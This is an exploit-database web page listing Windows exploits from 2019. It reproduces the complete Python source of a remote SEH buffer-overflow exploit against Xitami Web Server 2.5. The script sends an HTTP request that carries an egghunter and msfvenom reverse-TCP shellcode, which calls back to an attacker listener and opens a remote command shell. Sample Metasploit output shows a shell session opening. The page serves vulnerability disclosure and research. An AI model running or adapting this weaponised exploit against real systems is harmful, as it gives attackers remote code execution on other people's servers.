Menu

Improved exploit search engine. Try it out

"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)"

Author

ElSoufiane

Platform

windows

Release date

2019-05-06

Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-05-06 "Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)" remote windows ElSoufiane
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46797/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46797/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46797/41234/xitami-web-server-25-remote-buffer-overflow-seh-egghunter/download/", "exploit_id": "46797", "exploit_description": "\"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)\"", "exploit_date": "2019-05-06", "exploit_author": "ElSoufiane", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
# Date: May 4, 2019
# Author: ElSoufiane
# Version: 2.5b4
# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional
# Discovered by: Krystian Kloskowski
#
# Set up a multi handler listener in MSFConsole
# then run exploit
#
# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149
# [+] Sending exploit payload...
#
# Check the MSFConsole listener
#
# msf5 exploit(multi/handler) > run
# [*] Started reverse TCP handler on 0.0.0.0:5801
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 172.17.0.1
# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000



# C:\Xitami>

import socket
import sys
import struct

if len(sys.argv) != 2 :
	print "[+] Usage : python exploit.py [VICTIM_IP]"
	exit(0)

TCP_IP = sys.argv[1]
TCP_PORT = 80


egg = "SOUFSOUF"
nops = "\x90"*10

#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed
shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30"
shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64"
shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c"
shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78"
shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f"
shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c"
shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67"
shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62"
shellcode += "\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c"
shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51"
shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33"
shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69"
shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71"
shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71"
shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53"
shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55"
shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51"
shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b"
shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44"
shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54"
shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a"
shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a"
shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38"
shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37"
shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c"
shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f"
shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70"
shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79"
shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a"
shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71"
shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49"
shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50"
shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f"
shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a"
shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35"
shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50"
shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45"
shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30"
shellcode += "\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37"
shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f"
shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46"
shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30"
shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70"
shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f"
shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36"
shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48"
shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50"
shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70"
shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58"
shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55"
shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61"
shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c"
shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f"
shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f"
shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51"
shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56"
shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41"

egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nseh_jmp = "\xeb\xaa"	#jmp back 84 bytes
seh = "\x87\x1d\x40"	# (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite )

payload = "A"*120
payload += egghunter
payload += "A"*(190-len(payload))
payload += nseh_jmp
payload += seh

http_req = "GET / HTTP/1.1\r\n"
http_req += "Host: "+ TCP_IP +"\r\n"
http_req += "User-Agent: "+egg+nops+shellcode+"\r\n"
http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()